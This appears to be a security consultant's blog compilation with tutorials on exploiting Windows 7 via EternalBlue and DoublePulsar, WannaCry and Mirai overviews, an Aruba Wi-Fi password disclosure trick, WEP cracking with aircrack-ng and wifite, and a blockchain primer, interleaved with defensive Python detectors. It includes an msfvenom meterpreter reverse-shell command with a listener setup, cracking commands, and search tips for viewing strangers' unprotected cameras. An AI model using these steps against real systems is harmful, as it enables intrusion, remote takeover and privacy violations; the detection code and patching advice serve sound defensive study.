Exploiting Windows 7 & 2008 with EternalBlue and DoublePulsar

A few weeks back, the ShadowBrokers and Equation Group, two hacking groups, managed to leak the NSA’s version of the hacking tool “Fuzz Bunch”, which can be maliciously used to compromise any Windows 7 or Server 2008 R2 (x64) machine, all service packs, without needing authentication.

The FuzzBunch toolkit comes with a pre-cooked exploit, EternalBlue, which exploits a Windows SMB vulnerability, and a plugin, DoublePulsar. For your information, the same exploit code was taken advantage of to create the WannaCry ransomware, which succeeded in creating a big impact on computer networks all around the world.

With all that has happened, I decided to document the step-by-step approach to hacking a Windows 7 machine with the FuzzBunch toolkit. So let’s get started.

Note: This tutorial is just for informational and educational purposes; the author will not be responsible for any illegal hacking attempts against individuals or a production network made by any individual or group.

Environment:


  • Windows 7 : 10.21.1.118 : attacking machine with Fuzz Bunch installed (installing FuzzBunch has a few dependencies, such as python-2.6 and pywin32-212)
  • Kali : 10.21.1.119 : second attacking machine, used for creating the malicious DLL and for gaining access
  • Windows 7 : 10.21.1.124 : victim
  1. Once you have the setup ready, execute “python fb.py” on the Windows attacking machine to initialize the FuzzBunch toolkit.
  2. Next, configure the victim IP, fallback IP, redirection, project name and log directory (on the attacking Windows 7 machine).
  3. The first step in exploitation is to select the EternalBlue exploit so that FuzzBunch can execute it. At the prompt type “use EternalBlue” and press enter to configure the available options, such as target IP, port, target OS, etc.
  4. Once you are done it will ask you to execute EternalBlue; press enter to execute it against the target.
  5. As you can see, the target is successfully exploited and we should see the message “Eternalblue Succeeded”.
  6. Now it’s time to gain access to the machine using the backdoor that was installed. For this purpose we will use “msfvenom”, available in Kali, to create a malicious DLL and inject it through the “DoublePulsar” plugin.
  7. Execute the msfvenom command below to create the malicious DLL: “msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<kali machine IP> LPORT=<any non-standard port> -f dll -o <filename.dll>”
  8. Copy the DLL to the Windows attacking machine so it can be injected while using the DoublePulsar plugin.
  9. Launch the plugin by typing “use Doublepulsar” and configure the target IP, port, protocol, target OS architecture, malicious DLL to be injected, etc.
  10. Before you execute the plugin, open Metasploit, use “exploit/multi/handler” with the same payload used while creating the DLL, and start listening.
  11. Now you are good to launch the “DoublePulsar” plugin; if all goes well you will successfully exploit the target and gain access.

Follow similar steps to replicate the scenario in your test lab. Feel free to contact me if you have any queries: charit0819[at]gmail[dot]com

PS: Metasploit has also developed modules for the detection and exploitation of the vulnerability.

WannaCry – A Simple Perspective

So far more than 100 countries (UK, US, Russia, China, etc.) have been severely impacted by a professionally crafted piece of ransomware called “WannaCry” / “WannaCrypt”. The attack came into the limelight when the British National Health Service was targeted: its IT systems and patient information privacy were invaded and it was brought to its knees. The worm has already done damage worth millions and is still likely to spread. A group named @0xSpamTech has claimed responsibility. The worm encrypts files using AES and RSA encryption, which can only be decrypted using a unique key.

As per Wikipedia: “Ransomware is a type of malicious software that carries out the cryptoviral extortion attack from cryptovirology that blocks access to data until a ransom is paid and displays a message requesting payment to unlock it”.

But this worm/ransomware operates differently from that standard definition. The worm includes a component (payload) that searches for vulnerable systems on the network in order to infect them as well. Due to this unconventional behaviour the worm is able to keep infecting millions of Windows-based machines all over the globe. The security world has not witnessed a worm of this kind in the last 2 years.

The WannaCry worm uses a publicly known exploit (MS17-010), which is triggered by sending a specially crafted packet to an SMBv1 server. The vulnerability has now been fixed by Microsoft, but millions of organizations have yet to completely patch their IT infrastructure.

Microsoft has already released a set of patches that need to be installed in every production environment to prevent and block the worm from spreading/infecting others. Follow the link to read more.

List of Windows versions affected by this worm:
1. Windows XP
2. Microsoft Windows Vista SP2
3. Windows 7
4. Windows 8.1
5. Windows RT 8.1
6. Windows Server 2008 SP2 and R2 SP1
7. Windows Server 2012 and R2

Two infection signatures have been observed, which the worm utilizes to infect vulnerable machines.
– Social engineering, where the end user is persuaded/tricked into clicking on a link.
– Unpatched machines running the vulnerable version (v1) of the SMB protocol.
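The network side of the second infection vector above, the worm scanning its neighbours over SMB, is something a perimeter or host firewall log can show. The following is an added example (not from the original post, and not WannaCry’s or any vendor’s code) that flags a source touching many distinct hosts on TCP/445 within a short window; the log format and the addresses in the sample are constructed for the example.

```python
"""Added example: flag worm-style SMB fan-out in firewall logs.

WannaCry spreads by probing neighbouring hosts on TCP/445; one source
touching many distinct destinations on 445 in a short window is the
network signature of that behaviour. The log format and addresses below
are constructed for this example, not taken from any real device.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines: "<ISO timestamp> <src> <dst> <dport> <action>"
SAMPLE_LOG = """\
2017-05-12T10:00:01 192.0.2.10 10.0.0.10 445 ALLOW
2017-05-12T10:00:01 192.0.2.10 10.0.0.11 445 DENY
2017-05-12T10:00:02 192.0.2.10 10.0.0.12 445 DENY
2017-05-12T10:00:02 192.0.2.10 10.0.0.13 445 ALLOW
2017-05-12T10:00:03 192.0.2.10 10.0.0.14 445 DENY
2017-05-12T10:00:03 192.0.2.10 10.0.0.15 445 DENY
2017-05-12T10:00:04 192.0.2.10 10.0.0.16 445 DENY
2017-05-12T10:00:05 192.0.2.10 10.0.0.17 445 ALLOW
2017-05-12T10:00:06 192.0.2.10 10.0.0.18 445 DENY
2017-05-12T10:00:07 192.0.2.10 10.0.0.19 445 DENY
2017-05-12T10:00:10 192.0.2.50 10.0.0.20 445 ALLOW
2017-05-12T10:01:30 192.0.2.50 10.0.0.21 445 ALLOW
2017-05-12T10:00:11 192.0.2.51 10.0.0.22 80 ALLOW
"""


def parse_line(line):
    """Split one constructed log line into (timestamp, src, dst, dport, action)."""
    ts, src, dst, dport, action = line.split()
    return datetime.fromisoformat(ts), src, dst, int(dport), action


def smb_fanout(log_text, window_seconds=60, threshold=10):
    """Return {src: max distinct tcp/445 destinations in any window} for
    sources at or above the threshold. Denied attempts count too: a worm
    sweeping a subnet generates plenty of them."""
    events = defaultdict(list)
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        ts, src, dst, dport, _action = parse_line(raw)
        if dport == 445:
            events[src].append((ts, dst))

    window = timedelta(seconds=window_seconds)
    alerts = {}
    for src, evs in events.items():
        evs.sort()
        best, start = 0, 0
        for end in range(len(evs)):
            # Slide the window start forward until it spans at most window_seconds.
            while evs[end][0] - evs[start][0] > window:
                start += 1
            best = max(best, len({dst for _, dst in evs[start:end + 1]}))
        if best >= threshold:
            alerts[src] = best
    return alerts


if __name__ == "__main__":
    print(smb_fanout(SAMPLE_LOG))  # {'192.0.2.10': 10}
```

The second source in the sample touches two hosts 80 seconds apart and is not reported at the default window, which is the kind of tuning a real deployment needs: a file server or a backup job will legitimately fan out on 445, so the threshold and window should be set from a baseline of the environment’s normal traffic.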

After infecting the target PC, the user is presented with a message asking them to deposit $300-$600 in bitcoin to decrypt and unlock their files.

If you are interested in tracking the payments made to the hackers’ account, please follow the link; you can track payments to their Bitcoin addresses listed below:
– 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
– 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw
– 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94

How can you protect yourself?
1. Get the latest patches available from Microsoft and deploy them
2. Disable SMBv1 completely
3. Add firewall rules on the perimeter firewall to block any incoming connection to port 445

Extracting Wi-Fi Passwords from Aruba Virtual Controller

As usual I was conducting a pentest and found an interesting way to extract the passwords for multiple access points managed using an Aruba Virtual Controller (IAP 105).

What is a Virtual Controller?

The Aruba Instant virtual controller gives you the flexibility of configuring multiple access points from a centralized location.
You can distribute, store and regulate configuration for distributed access points from one place. The virtual controller is basically a single point of management for your configuration and firmware.
Firmware versions prior to IAP-105 are vulnerable to an access point password disclosure vulnerability: any malicious user having access to the management console can extract sensitive details using just the browser’s debugger (Chrome, Firefox, IE, etc.).
You can extract the passwords using the simple steps below:
1. Log in to the Aruba virtual controller (in my case it was the default admin/admin).
2. Click on the network you want to disclose the wireless key for.
3. Click edit Factory Settings >> Go to Security Settings.
4. Open the browser’s debugger.
5. For the password text box, change the type to “text” in the HTML.
6. Voila!!
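The reason step 5 works is that the management page already contains the key: the “password” input type only masks it on screen, and the secret travels to every browser that loads the page. The following added example (not from the original post, and not Aruba’s markup or code) is the check a tester or developer can run over a captured page of their own web UI to find password fields that arrive pre-filled with a value; the two forms in it are constructed for the example.

```python
"""Added example: find password fields that arrive pre-filled with a secret.

A "password" input only masks the value on screen; if the server writes the
real PSK into the value attribute, anyone who can view the page source or
use the browser's debugger can read it. The forms below are constructed
for this example and are not Aruba's actual markup.
"""
from html.parser import HTMLParser

# Constructed: a settings page that echoes the stored passphrase back into the form.
LEAKY_FORM = """
<form action="/wlan/save" method="post">
  <input type="text" name="ssid" value="CorpWiFi">
  <input type="password" name="wpa_passphrase" value="S3cretPassphrase!">
</form>
"""

# Constructed: the same page with the field left empty; "leave blank to keep
# the current passphrase" is handled server-side, so the secret never leaves it.
SAFE_FORM = """
<form action="/wlan/save" method="post">
  <input type="text" name="ssid" value="CorpWiFi">
  <input type="password" name="wpa_passphrase" value="" placeholder="(unchanged)" autocomplete="new-password">
</form>
"""


class PrefilledPasswordFinder(HTMLParser):
    """Collect the names of <input type="password"> elements that carry a non-empty value."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "input":
            return
        # attrs is a list of (name, value); value is None for bare attributes
        a = {k.lower(): (v or "") for k, v in attrs}
        if a.get("type", "").lower() == "password" and a.get("value"):
            self.findings.append(a.get("name", "<unnamed>"))


def prefilled_password_fields(html):
    """Return the names of password fields whose value was sent by the server."""
    finder = PrefilledPasswordFinder()
    finder.feed(html)
    finder.close()
    return finder.findings


if __name__ == "__main__":
    print(prefilled_password_fields(LEAKY_FORM))  # ['wpa_passphrase']
    print(prefilled_password_fields(SAFE_FORM))   # []
```

The fix on the server side is the pattern the second form shows: never render the stored secret into the page; accept a new value when the field is non-empty and leave the stored one untouched otherwise. Changing the input type in the debugger then reveals nothing, because there is nothing there to reveal.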

Blockchain : The Future of Digital Payment

  1. What is Blockchain?

Today we rely completely on middlemen for our day-to-day services: banks, service providers and credit card companies. Blockchain is a vast, global, distributed system acting as the middleman; it runs on systems around the world and is open to everybody. Trust is established not by a middleman but by mass collaboration, clever code and, of course, cryptography, and that is what this amazing technology is.

Usually, when working with digital content, you send a copy and retain the original yourself, but when it comes to value-based things like money, stocks, bonds and financial assets, sending a copy is not a good idea. For example: if I send you 100 dollars as payment for something, it becomes really important that you have those 100 dollars and I don’t, because if I can share the same 100 dollars among other transactions, then the 100 dollars becomes worthless.

  2. How Blockchain works

Using Blockchain, buyers and sellers can transfer value directly to each other over the internet in the most secure way possible without the need for a third party. Blockchain is a distributed ledger maintained globally on multiple systems, not owned by any specific party; the database of transactions is secured with clever code and strong cryptography, making it hacker proof. Blockchain will do for business what the internet did for communication.

Simple real-life example: the journey of diamonds from mines to consumers’ hands covers a complex path of legal, regulatory, financial, manufacturing and commercial practices. The current supply chain for diamonds has to rely on intermediaries at every step of the way, from government officials to dealers and banks, which adds time and cost. Smuggling and fraud in diamond trading can hamper governments in collecting fair export taxes, and as a result consumers will bear the cost of counterfeit products or unethically mined stones.

This is where Blockchain can come into the picture to rescue us, with the capability to eliminate these vulnerabilities through distributed, secure and transparent transactions. Blockchain provides all parties involved with a synchronized network of transactions; it records every sequence of transactions from beginning to end, whether it is 100 steps in procuring goods or just a single direct transaction. Each transaction that occurs is put into a block, and each block is connected with the one before and after it: groups of transactions are attached together and the fingerprint of each one is added to the next, thus creating an irreversible chain.

Blockchain is capable of tracking goods from raw materials to the finished product in the consumer’s hands, with embedded security and transparency. Blockchain is distributed, permissioned and secure, which makes it more reliable than the traditional payment systems currently used globally.

Blockchain ledgers are distributed across the network, which ensures that no one person or organization can edit the transaction records. All parties involved in the trade of goods, from raw materials to finished products, own a copy of every single transaction record, and no transaction can be added to the Blockchain without consensus across the parties involved. This means no single entity or company can add or alter transactions without it being permanently recorded, which makes it highly secure and eliminates the risk of fraud.
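The “fingerprint of each one added to the next” idea above is easy to see in code. The following is an added example, not part of the original post and not any real blockchain implementation: a three-block hash chain over constructed diamond supply-chain transactions, with a verifier that reports the first block whose link no longer holds.

```python
"""Added example: a minimal hash chain showing why an altered block is detectable.

Each block carries the SHA-256 fingerprint of the previous block, so changing
any earlier transaction breaks every link after it. The diamond supply-chain
batches are constructed sample data; this is not any real blockchain's code.
"""
import hashlib
import json

GENESIS_PREV = "0" * 64

# Constructed: one batch of transactions per block, following a stone from mine to retailer.
SAMPLE_BATCHES = [
    [{"from": "mine", "to": "cutter", "stone": "D-1001", "carats": 2.1}],
    [{"from": "cutter", "to": "dealer", "stone": "D-1001", "carats": 1.4}],
    [{"from": "dealer", "to": "retailer", "stone": "D-1001", "carats": 1.4}],
]


def block_hash(block):
    """Fingerprint of the block contents (everything except the hash field itself)."""
    body = {k: block[k] for k in ("index", "prev_hash", "transactions")}
    return hashlib.sha256(json.dumps(body, sort_keys=True).encode()).hexdigest()


def build_chain(batches):
    """Link one block per batch; each block stores the previous block's hash."""
    chain, prev = [], GENESIS_PREV
    for i, txs in enumerate(batches):
        block = {"index": i, "prev_hash": prev, "transactions": [dict(t) for t in txs]}
        block["hash"] = block_hash(block)
        chain.append(block)
        prev = block["hash"]
    return chain


def verify_chain(chain):
    """Return the index of the first inconsistent block, or None if every link holds."""
    prev = GENESIS_PREV
    for i, block in enumerate(chain):
        if block["index"] != i or block["prev_hash"] != prev or block_hash(block) != block["hash"]:
            return i
        prev = block["hash"]
    return None


def tamper_demo():
    """Show three states: intact, edited in place, edited with its own hash recomputed."""
    intact = verify_chain(build_chain(SAMPLE_BATCHES))
    chain = build_chain(SAMPLE_BATCHES)
    chain[1]["transactions"][0]["carats"] = 9.9      # inflate the stone's weight
    edited = verify_chain(chain)                      # block 1 no longer matches its hash
    chain[1]["hash"] = block_hash(chain[1])           # forger recomputes block 1's hash...
    relinked = verify_chain(chain)                    # ...but block 2 still points at the old one
    return intact, edited, relinked


if __name__ == "__main__":
    print(tamper_demo())  # (None, 1, 2)
```

Note the third result: a forger who edits block 1 and recomputes its hash still breaks block 2’s prev_hash, and would have to rewrite every later block as well. On a single machine that is possible; what stops it in practice is the distribution and consensus described above, since every other party’s copy still holds the original hashes.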

  3. How to use and utilize Blockchain as an individual

A) Set up your Blockchain wallet (https://blockchain.info/)

B) Get some bitcoins (https://bitcoin.com)

C) Find merchants who accept bitcoins and start trading

D) If you want to receive bitcoins, you need to share the code generated by your wallet

  4. Blockchain Benefits and Challenges

Benefits

  • It enables the exchange of value without a third party being involved
  • Wallet owners have full control over their information and resources
  • The data in the Blockchain is consistent and secure
  • Due to its decentralized nature, the technology has no central point of failure
  • Any change made to the transaction records is publicly viewable
  • Helps in lowering transaction costs

Challenges

  • The underlying infrastructure needs to be reliable and robust to support faster transactions
  • Blockchain technology has to be accepted by government regulations for widespread adoption
  • Relatively more energy is consumed in validating Blockchain transactions
  • High initial capital is required for large business environments
  • A few privacy and security concerns still need to be addressed to gain the trust of the general public

Mapping Mirai Botnet

A malicious botnet made out of the Mirai malware has disrupted internet traffic to popular websites like Twitter, GitHub, PayPal, etc. in the United States. According to popular network security companies, the botnet was specially crafted to attack internet-connected cameras and DVRs. The Chinese company “Hangzhou Xiongmai Technology” (a network camera manufacturer) has admitted that its devices were behind Friday’s DDoS attack and is recalling 3.8 million affected devices to fix them. The DNS service provider Dyn has also confirmed that it observed millions of discrete IP addresses associated with the Mirai botnet. Most of the service providers affected by the botnet were able to recover from the attack easily, but botnets like these can attack again in the future. Last month the same botnet took Brian Krebs’s website down by delivering 665 Gbps of traffic.

How the botnet works: the botnet is designed to brute-force the telnet service on internet-connected cameras installed with Dahua firmware or a generic management interface called “NETSurveillance”, using 62 different combinations of usernames and passwords (admin:admin, admin:12345, etc.). Once the botnet is able to log in to the camera, services like telnet, SSH and HTTP are blocked and the device is seeded with a malicious program that turns it into an enslaved bot. These bots then report to the command and control centre, from where DDoS attacks can be launched to make websites unresponsive. These attacks could have been avoided if the camera login panels or the Real Time Streaming Protocol service were restricted from remote access.
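From the device’s side, the brute-force stage described above shows up in the authentication log as a burst of failed telnet logins from one address cycling through a few usernames, followed by a success once a default pair works. The following added example (not from the original post, and not code from any camera vendor or from Mirai) reports that pattern from a constructed telnet log; the log format and addresses are assumptions made for the example.

```python
"""Added example: spot Mirai-style credential guessing in a device's telnet log.

The signature is many failed logins from one source, cycling through a short
list of usernames, often followed by a success (the default credentials
worked). The log format and addresses are constructed for this example, not
taken from any real camera firmware.
"""
import re
from collections import defaultdict

LOGIN_RE = re.compile(
    r"^(?P<ts>\S+) telnetd\[\d+\]: login (?P<result>ok|failed) "
    r"user='(?P<user>[^']*)' from (?P<src>\S+)$"
)

# Constructed sample: one scanner (198.51.100.7) and one legitimate admin who mistyped once.
SAMPLE_LOG = """\
2016-10-21T08:00:01 telnetd[411]: login failed user='admin' from 198.51.100.7
2016-10-21T08:00:02 telnetd[412]: login failed user='admin' from 198.51.100.7
2016-10-21T08:00:02 telnetd[413]: login failed user='root' from 198.51.100.7
2016-10-21T08:00:03 telnetd[414]: login failed user='root' from 198.51.100.7
2016-10-21T08:00:03 telnetd[415]: login failed user='support' from 198.51.100.7
2016-10-21T08:00:04 telnetd[416]: login failed user='admin' from 198.51.100.7
2016-10-21T08:00:05 telnetd[417]: login ok user='admin' from 198.51.100.7
2016-10-21T08:10:00 telnetd[420]: login failed user='admin' from 203.0.113.5
2016-10-21T08:10:07 telnetd[421]: login ok user='admin' from 203.0.113.5
"""


def brute_force_report(log_text, threshold=5):
    """Per source at or above the failure threshold: failure count, usernames
    tried, and whether a login succeeded after the count had reached it."""
    state = defaultdict(lambda: {"failures": 0, "users": set(), "success_after_failures": False})
    for line in log_text.splitlines():
        m = LOGIN_RE.match(line)
        if not m:
            continue  # unrelated log line
        s = state[m["src"]]
        if m["result"] == "failed":
            s["failures"] += 1
            s["users"].add(m["user"])
        elif s["failures"] >= threshold:
            # A success only after a run of failures is the "default password worked" case.
            s["success_after_failures"] = True
    return {
        src: {"failures": s["failures"], "users": sorted(s["users"]),
              "success_after_failures": s["success_after_failures"]}
        for src, s in state.items() if s["failures"] >= threshold
    }


if __name__ == "__main__":
    print(brute_force_report(SAMPLE_LOG))
    # {'198.51.100.7': {'failures': 6, 'users': ['admin', 'root', 'support'], 'success_after_failures': True}}
```

A source with success_after_failures set is the one to treat as a compromised device, not just a noisy one: the mitigation the post goes on to recommend (no default password, no telnet reachable from the internet) removes both the failures and the success.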

Source code released online: the author behind the Mirai malware has released the code online for research and development purposes, stating “I have earned my share of money and now I want to get out of this business”. Follow the link to download the source code: https://github.com/jgamblin/Mirai-Source-Code.
What to do: the Chinese company has advised its customers to change default passwords, update the firmware of the device and keep the devices disconnected until patched. A few researchers are also arguing on the subject of why a device like a network camera needs remote access from the internet, and up to a certain level I am also in favor of this response. Companies making IoT devices should force the user to change the default password during initial configuration, and remote access to such sensitive and weak IoT devices should not be enabled.

How you can access unprotected network cameras:
1. Try searching on Google for “inurl:index.shtml” and follow a link with an IP address in the URL. If you are lucky enough you will be able to see the live view of an internet-connected camera streaming from some other continent.

2. Multiple websites are available on the internet that can be used to look for devices connected to the internet with a specific configuration. Below is a screenshot for your reference where I tried searching for a specific network camera on the internet.
Clicking on any of the listed options will take you to the login panel straight away. I think you can now also realize how easy it can be to attack a specific set of devices connected to the internet.
Conclusion: it is very probable that we will see such DDoS attacks in the near future targeting vulnerable IoT devices. The manufacturers of these devices should consider a few basic security practices before shipping their products.

Wi-Fi (WEP) cracking with Aircrack (easy 4 steps)

In my last post I tried exploiting WEP Wi-Fi networks with wifite. Using wifite was no coincidence, but I was facing a few difficulties that forced me to use something simple and easy. But something kept bothering me inside: why can I not crack the same using aircrack? I desperately wanted to try it out.

So I woke up the next morning and started going through some of the best articles available on the web just to warm up a little bit, which certainly helped. And here we are with a successfully cracked WEP network.

Follow the below steps to successfully crack WEP based wi-fi networks.

  1. Start your Wi-Fi interface in monitor mode with the command “airmon-ng start wlan0” (I am using an external Wi-Fi adapter for more attack surface).
  2. Start listening for nearby access points with “airodump-ng mon0” and choose your target. For me the target will be the same as the old one, “*******250”.
  3. Start listening to the specific WEP network: “airodump-ng -c <channel no> --bssid <access point mac> -w <file name> mon0”
  4. Once you see that a significant number of IVs have been captured, go ahead and launch aircrack: “aircrack-ng <file name>”.
  5. DONE !! 😀

Note: This tutorial is for educational purposes only; use the steps at your own risk and attack only an AP which you own. Unless and until you have permission from the owner, please do not try this.

In my next post I will share my experience of trying to take this to the next level: WPA/WPA2.

Wi-Fi (WEP) Cracking in less than 5 mins

As part of a wireless security assessment I was asked to assess a client’s wireless security posture. The day before, I decided to do some homework and try a few tools available in Kali Linux. I started with a tutorial related to aircrack-ng and its related tool set, where we capture IVs, de-authenticate clients and crack the IVs; even after a couple of hours I was unable to crack even the weakest networks around.

Out of frustration I decided to try another tool, and this time it was “wifite”, which I had never used or heard of. After reading a bit about it online I planned to go ahead and start playing around. And surprisingly it took less than 3-5 mins for wifite to crack the network I was struggling with.

Below are the steps I followed to crack the WEP network.

  1. Run the command “wifite” to initiate the tool and wait for at least 3-5 minutes to let it collect information about nearby wireless networks, such as security protocol, signal strength, WPS yes/no, clients connected or not, etc.

2. Once you see a significant number of nearby access points, press “Ctrl+C” to choose which access point to attack. I selected the “****250” access point as my target.

Just select your target and let the tool do its magic.

And voila!! In less than a minute the key was cracked.

Conclusion: after trying WEP cracking I realised how weak WEP can be.

Suggestion: never use WEP as the security protocol for your access points.
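The reason a few thousand captured IVs are enough, in both this post and the aircrack one above, comes down to how WEP keys each frame. The following is an added example, not from either post and not part of aircrack-ng or wifite: a toy RC4 keyed the WEP way (3-byte IV sent in clear, followed by the shared secret) showing that two frames under the same IV leak the XOR of their plaintexts with no knowledge of the secret, plus the birthday-bound probability of an IV repeat after a given number of frames. The secret, IV and frame contents are constructed.

```python
"""Added example: why WEP's 24-bit IV is the weak point.

WEP keys each frame with RC4(IV || shared secret) and sends the IV in clear.
With only 2^24 IVs, two frames reuse a keystream after a few thousand
packets, and XORing those two ciphertexts cancels the keystream entirely.
The toy RC4 and the frames below are constructed for illustration; nothing
here talks to a network.
"""
import math


def rc4_keystream(key, length):
    """Plain RC4 (KSA + PRGA) producing `length` keystream bytes."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(iv, secret, plaintext):
    """WEP-style per-frame keying: RC4 key = 3-byte IV || shared secret.
    XOR with the keystream is its own inverse, so the same call decrypts."""
    keystream = rc4_keystream(iv + secret, len(plaintext))
    return bytes(p ^ k for p, k in zip(plaintext, keystream))


def xor_bytes(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def keystream_reuse_leak(iv, secret, frame1, frame2):
    """What an observer learns from two frames sharing an IV: C1 XOR C2 equals
    P1 XOR P2, because the identical keystream cancels out."""
    return xor_bytes(wep_encrypt(iv, secret, frame1), wep_encrypt(iv, secret, frame2))


def iv_collision_probability(frames, iv_bits=24):
    """Birthday bound: chance that at least two of `frames` randomly chosen IVs coincide."""
    space = 2 ** iv_bits
    return 1 - math.exp(-frames * (frames - 1) / (2 * space))


if __name__ == "__main__":
    secret = b"\x01\x02\x03\x04\x05"            # constructed 40-bit WEP secret
    iv = b"\x0a\x0b\x0c"                        # constructed IV (sent in clear in WEP)
    p1, p2 = b"ARP who-has 10.0.0.1", b"DHCP discover frame "
    leaked = keystream_reuse_leak(iv, secret, p1, p2)
    print(leaked == xor_bytes(p1, p2))          # True: no secret needed
    print(round(iv_collision_probability(5000), 2))  # 0.53
```

At 5,000 frames the chance of at least one repeated IV is already above one half, and a busy network sends that many in seconds; with a known-plaintext frame such as an ARP request, the XOR above then gives up the other frame directly. This is the structural flaw that no passphrase strength can fix, which is the reason behind the suggestion above.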

Be safe, stay secure!! And kudos to the author of “wifite”.

Note: This tutorial is for educational purposes only; use the steps at your own risk and attack only an AP which you own. Unless and until you have permission from the owner, please do not try this.

In my next post I will share my experience of trying to take this to the next level: WPA/WPA2.

Consultant – IT Security